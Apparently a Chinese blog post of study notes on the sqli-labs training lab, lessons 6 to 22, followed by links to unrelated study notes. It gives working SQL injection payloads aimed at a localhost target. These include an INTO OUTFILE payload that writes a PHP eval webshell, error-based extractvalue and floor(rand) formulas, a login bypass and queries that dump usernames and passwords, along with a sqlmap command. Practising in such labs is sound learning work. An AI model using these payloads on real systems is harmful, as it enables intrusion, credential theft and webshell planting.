sqli-labs学习笔记 DAY3
DAY 3
sqli-labs lesson 6
- 同lesson 5,只是把单引号改为双引号
sqli-labs lesson 7
- 同lesson 5,只是把单引号后面加两个空格,使用Burpsuit时,需要对结果进行匹配
- 这一关主要要学习的是sql种into outfile这个命令
- 这个命令能够把字符串写入文件,但必须拥有目录的权限
- 可以通过类似lesson5中猜解数据库名称的方法,猜解出@@datadir数据库目录
- 然后把一句话木马上传到服务器
- 命令:http://localhost/sqli-labs-master/Less-7/?id=1’))+UNION+SELECT+1,2,"<?php @eval($_GET(‘cmd’)) ?>"+into+outfile+“D:\\phpStudy\\WWW\\sqli-labs-master\\a.php”;–+
- 注意:如果提示secure-file-priv错误,在mysql.ini中写入"secure_file_priv = "即可
- sqlmap注入同lesson 2
sqli-labs lesson 8
- 同lesson 5 布尔型注入
sqli-labs lesson 9
- 同lesson 5 基于延迟的注入
补充lesson 5的一种手工注入方法
- 基于错误回显的注入
- 如果在检测注入点时发现网页会回显sql语法错误,但是网页上却没有能用的回显点,可以使用这种方法。
- 公式:
and (select 1 from (select count(*),concat((payload),floor(rand(0)*2))x from information_schema.tables group by x)a)
- 使用时把payload改为SQL语句即可
sqli-labs lesson 10
- 同lesson 5基于时间延迟的注入,只不过把单引号改为双引号
sqli-labs lesson 11
- 手工注入
- 首先想到尝试使用amdin账户登录,事实上,无论能否登录,都不影响这一关
- 用户名任意,密码填入:1’ OR 1=1;#,会爆出一个用户,说明这里存在注入点,可以尝试联合查询语句。
- 用户名填:1’ UNION SELECT 1,2;#,密码随意,发现网页上有两个回显点。
- 其他步骤均与之前相同。


- sqlmap
- 命令:python sqlmap.py -u http://localhost/sqli-labs-master/Less-11/ --data “uname=1&passwd=1&submit=Submit” --batch
- –data参数:用于发送数据,GET和POST方法均适用。
- 其他均相同
- 补充
- –dbs参数:查询所有数据库
- –threads x:设置最大病发线程数,建议不要超过10
- –techniques X(X=B布尔型,E报错型,U联合注入型,T延迟型):指定注入类型
sqli-labs lesson 12
- 同上一题,把单引号改为双引号加右括号
sqli-labs lesson 13
- 闭合符号为单引号加右括号,由于没有注入点,可以使用报错型注入,也可与基于返回的图片使用布尔型注入。
- 可以使用Burpsuit辅助,简化注入过程
- sqlmap注入过程极慢
sqli-labs lesson 14
- 闭合符号为双引号,其他同lesson 13
- 注意使用HackBar时,要把符号编码
sqli-labs lesson 15
- 布尔型注入,闭合符号为单引号,同lesson 13
sqli-labs lesson 16
- 布尔型注入,闭合符号为双引号加右括号。
sqli-labs lesson 17
- 这是个更新密码的操作,使用的是SQL语句中的UPDATE
UPDATE table_name
SET column1=value1,column2=value2,...
WHERE some_column=some_value;
- 可以使用报错型注入
- 也可以使用延时型注入
- 根据源码,UPDATE语句中的用户名是经过一次转义并且SELECT之后获得的用户名,所以不能直接在用户名上检测
sqli-labs lesson 18
- 注入点在HTTP头,抓包修改User-Agent即可(可使用Burpsuit,其他抓包工具一般也支持),这一关是SQL的插入语句,这里使用报错型注入
- 报错型注入的第二种公式:'and extractvalue(1,concat(0x7e,(payload),0x7e))
- 爆库:'and extractvalue(1,concat(0x7e,(database()),0x7e)) and ‘1’='1

- 爆表:'and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=‘security’),0x7e)) and ‘1’='1
- 爆字段:'and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name=‘users’),0x7e)) and ‘1’='1
- 爆记录:'and extractvalue(1,concat(0x7e,(select concat_ws(",",username,password) from security.users limit n,1),0x7e)) and ‘1’='1
- 爆库:'and extractvalue(1,concat(0x7e,(database()),0x7e)) and ‘1’='1
sqli-labs lesson 19
- 同lesson 18,只不过改成修改Referer参数了
sqli-labs lesson 20
- 根据源码,这一次,是要修改COOKIE里的uname值,方法同lesson 18
sqli-labs lesson 21
- COOKIE中的用户名经过base64编码,所以注入方法同lesson 20,注意要把payload也进行编码
sqli-labs lesson 22
- 和上一题一样,只不过闭合闭合符号使用的双引号,修改一下符号即可
sqli-labs学习笔记 DAY3的更多相关文章
- python网络爬虫与信息提取 学习笔记day3
Day3: 只需两行代码解析html或xml信息 具体代码实现:day3_1 注意BeautifulSoup的B和S需要大写,因为python大小写敏感 import requests r ...
- Sqli - Labs 靶场笔记(一)
Less - 1: 页面: URL: http://127.0.0.1/sqli-labs-master/Less-1/ 测试: 1.回显正常,说明不是数字型注入, http://127.0.0.1/ ...
- Python学习笔记——Day3
Python字典(Dictionary) 字典是一种可变容器模型,可存储任意类型对象. 字典的每个键值(key => value)对用冒号(:)分割,每个对之间用逗号(,)分割,整个字典包括在花 ...
- [python学习笔记]Day3
函数 如: def is_leapyear(year): if (year%4 == 0 and year%100 != 0) or (year%400 == 0): return True else ...
- JS学习笔记Day3
一.什么是循环结构 满足一定条件,(((重复)))执行一段相同的代码 二.循环思想是什么(循环三要素) 开始 结束 步长(步进) 三.可以实现循环语句的有哪些 while do while for 四 ...
- HTML学习笔记Day3
一.CSS样式 1.每个css样式都必须由两部分组成:选择符(Selector)+声明(Deleration) 注:声明又包括属性(Properyt)和属性值(value) 2.css属性:属性是指定 ...
- python学习笔记Day3
set有点:1.访问速度快 2.天生解决了重复问题 tuple与set区别: 元组可重复,set不可重复创捷集合1 >>> s1.add('alex')>>> pr ...
- Python学习笔记 - day3 - 数据类型及运算符
Python的数据类型 计算机顾名思义就是可以做数学计算的机器,因此,计算机程序理所当然地可以处理各种数值.但是,计算机能处理的远不止数值,还可以处理文本.图形.音频.视频.网页等各种各样的数据,不同 ...
- Linux20期学习笔记 Day3
管道符.通配符.转义符及部分常用命令.考点
随机推荐
- Python 学习笔记(十五)Python类拓展(二)方法
方法 绑定方法和非绑定方法 绑定方法和非绑定方法在创建时没有任何区别,同一方法,既可以为绑定方法,也可以为非绑定方法,一切不同都只在调用时的手法上有所区别. 绑定方法即该方法绑定类的一个实例上,必须将 ...
- Linux -- 目录基本操作(1)
cd 切换目录 1.切换到指定目录下 #cd 相对/绝对目录 [root@localhost ~]# cd /home/tom/demo [root@localhost demo]# 2.切换到某个用 ...
- Web—09-正则表达式
正则表达式 1.什么是正则表达式: 能让计算机读懂的字符串匹配规则. 2.正则表达式的写法: var re=new RegExp('规则', '可选参数'); var re=/规则/参数; 3.规则中 ...
- oracle10g学习笔记
1.简介 1.1.sql:Structured Query Language 结构化查询语言 1.2.windows在目录路径中使用反斜线\,unix和linux使用正斜线/ 1.3.Number(a ...
- C语言写的2048小游戏
基于"基于C_语言的2048算法设计_颜冠鹏.pdf" 这一篇文献提供的思路 在中国知网上能找到 就不贴具体内容了 [摘 要] 针对2048的游戏规则,分析了该游戏的算法特点,对其 ...
- 大数据:Windows下配置flink的Stream
对于开发人员来说,最希望的是需要在windows中进行测试,然后把调试好的程序放在集群中运行.下面写一个Socket,上面是监控本地的一个运行端口,来实时的提取数据.获取视频中文档资料及完整视频的伙伴 ...
- EntityFramework6.1自动生成复数名称数据表的问题
遇到一个很奇怪的问题,两个程序部署在两个不同的机器上,一个是.net 4.6.1另外一个是.net 4.0的运行时,两个项目都引用了EntityFramework6.1.3.程序分别执行后,4.0环境 ...
- NoSQL入门第一天——NoSQL入门与基本概述
一.课程大纲 二.入门概述 1.为什么用NoSQL 单机MySQL的年代: 一个网站的访问量一般都不大,用单个数据库完全可以轻松应付. 我们来看看数据存储的瓶颈是什么? 1.数据量的总大小 一个机器放 ...
- 20155220 2016-2017-2 《Java程序设计》第八周学习总结
20155220 2016-2017-2 <Java程序设计>第八周学习总结 教材学习内容总结 第14章 NIO与NIO2 NIO简介 NIO使用频道来衔接数据结点,在处理数据时,NIO可 ...
- 20155308&20155316 2017-2018-1 《信息安全系统设计基础》实验一
20155308&20155316 2017-2018-1 <信息安全系统设计基础>实验一 此次实验我和黄月同学一起做了1.2.3.5项,第4项在实验课上做完了,但是没有按时提交. ...